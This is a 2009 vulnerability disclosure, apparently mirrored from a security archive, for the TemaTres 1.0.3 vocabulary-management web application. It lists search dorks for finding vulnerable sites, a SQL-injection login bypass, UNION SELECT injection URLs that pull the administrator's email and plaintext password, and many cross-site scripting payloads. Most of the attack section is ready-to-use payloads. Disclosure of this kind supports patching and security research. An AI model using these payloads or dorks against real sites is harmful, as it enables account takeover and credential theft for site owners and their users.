Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21782
HistoryMay 05, 2009 - 12:00 a.m.

MULTIPLE REMOTE VULNERABILITIES--TemaTres 1.0.3-->

2009-05-0500:00:00
vulners.com
25

MULTIPLE REMOTE VULNERABILITIES–TemaTres 1.0.3–>

CMS INFORMATION:

–>WEB: http://www.r020.com.ar/tematres/
–>DOWNLOAD: http://sourceforge.net/projects/tematres/
–>DEMO: http://www.r020.com.ar/tematres/index.php
–>CATEGORY: CMS / Portals
–>DESCRIPTION: Web application to manage controlled vocabularies, taxonomies and thesaurus…

CMS VULNERABILITY:

–>TESTED ON: firefox 3
–>DORKs: "Powered by TemaTres" / "Generado por TemaTres" / "Criado por TemaTres"
–>CATEGORY: AUTH BYPASS/ SQL INJECTION/ XSS
–>AFFECT VERSION: LAST = 1.0.3 (maybe <= ?)
–>Discovered Bug date: 2009-04-23
–>Reported Bug date: 2009-04-23
–>Fixed bug date: 2009-05-04
–>Info patch (v1.0.31): http://www.r020.com.ar/tematres/tematres1.031.zip
–>Author: YEnH4ckEr
–>mail: y3nh4ck3r[at]gmail[dot]com
–>WEB/BLOG: N/A
–>COMMENT: A mi novia Marijose…hermano,cunyada, padres (y amigos xD) por su apoyo.
–>EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!).

############

CONDITIONS:

############

**gpc_magic_quotes=off

**DBPREFIX='lc_' (Default)

####################

AUTH BYPASS (SQLi):

####################

mail:' or 1=1 /*
password: Nothing

Or…

mail: Something
password:' or 1=1 /*

######################

SQL INJECTION (SQLi):

######################


http://[HOST]/[HOME_PATH]/index.php?letra=2&#39;+union+all+select+1,mail,3,pass+FROM+lc_usuario+WHERE+id=1/*

&lt;------------ Got mail/pass of user id = 1 &#40;admin&#41; &#40;pass no encrypted!&#41; ------------&gt;

~~~~~~----&gt;Resgistered user &#40;get vars --&gt; &#39;y&#39; and &#39;m&#39;&#41;:

http://[HOST]/[HOME_PATH]/sobre.php?m=10&amp;y=2007&#39;+AND+0+UNION+ALL+SELECT+1,concat&#40;mail,&#39;&lt;-:::-&gt;&#39;,pass&#41;,3,4,version&#40;&#41;,concat&#40;user&#40;&#41;,&#39;&lt;-:::-&gt;&#39;,database&#40;&#41;&#41;,7+FROM+lc_usuario+WHERE+id=1/*

http://[HOST]/[HOME_PATH]/sobre.php?m=10&#39;+AND+0+UNION+ALL+SELECT+1,concat&#40;mail,&#39;&lt;-:::-&gt;&#39;,pass&#41;,3,4,version&#40;&#41;,concat&#40;user&#40;&#41;,&#39;&lt;-:::-&gt;&#39;,database&#40;&#41;&#41;,7+FROM+lc_usuario+WHERE+id=1/*&amp;y=2007

&lt;------------ Got mail/pass of user id = 1 &#40;admin&#41; &#40;pass no encrypted!&#41; ------------&gt;



############################
----------------------------
CROSS SITE SCRIPTING &#40;XSS&#41;:
----------------------------
############################


There are a lot of links &#40;This isn&#39;t entire list&#41;:


~~~-------&gt;Unregistered user


&lt;----Search form----&gt;

&lt;script&gt;while&#40;1&#41;{alert&#40;&#39;y3nh4ck3r was here!&#39;&#41;}&lt;/script&gt;


&lt;----More links----&gt;

http://[HOST]/[HOME_PATH]/index.php?_expresion_de_busqueda=&lt;script&gt;alert&#40;&#39;y3nh4ck3r was here!&#39;&#41;&lt;/script&gt;&amp;sgs=off

http://[HOST]/[HOME_PATH]/index.php?letra=D&lt;script&gt;alert&#40;&#39;y3nh4ck3r was here!&#39;&#41;&lt;/script&gt;

http://[HOST]/[HOME_PATH]/index.php?estado_id=14&quot;&gt;&lt;script&gt;alert&#40;&#39;y3nh4ck3r was here!&#39;&#41;&lt;/script&gt;

http://[HOST]/[HOME_PATH]/index.php?tema=&quot;&gt;&lt;script&gt;alert&#40;&#39;y3nh4ck3r was here!&#39;&#41;&lt;/script&gt;

http://[HOST]/[HOME_PATH]/index.php?tema=2&amp;/trmino-subordinado-de-ejemplo&quot;&gt;&lt;script&gt;alert&#40;&#39;y3nh4ck3r was here!&#39;&#41;&lt;/script&gt;


~~~-------&gt;Registered user


&lt;----Posting here----&gt;

http://[HOST]/[HOME_PATH]/index.php?edit_id=12&amp;tema=12

&lt;script&gt;alert&#40;&#39;y3nh4ck3r was here!&#39;&#41;&lt;/script&gt;


&lt;----More links----&gt;

http://[HOST]/[HOME_PATH]/sobre.php?m=10&amp;y=2007&quot;&gt;&lt;script&gt;alert&#40;&#39;y3nh4ck3r was here!&#39;&#41;&lt;/script&gt;

http://[HOST]/[HOME_PATH]/sobre.php?m=10&amp;y=2007&amp;ord=F&quot;&gt;&lt;script&gt;alert&#40;&#39;y3nh4ck3r was here!&#39;&#41;&lt;/script&gt;

http://[HOST]/[HOME_PATH]/sobre.php?m=10&quot;&gt;&lt;script&gt;alert&#40;&#39;y3nh4ck3r was here!&#39;&#41;&lt;/script&gt;&amp;y=2007


#######################################################################
#######################################################################
##*******************************************************************##
##            ESPECIAL GREETZ TO: Str0ke, JosS, Ulises2k ...         ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
##              GREETZ TO: SPANISH H4ck3Rs community!                ##
##*******************************************************************##
#######################################################################
#######################################################################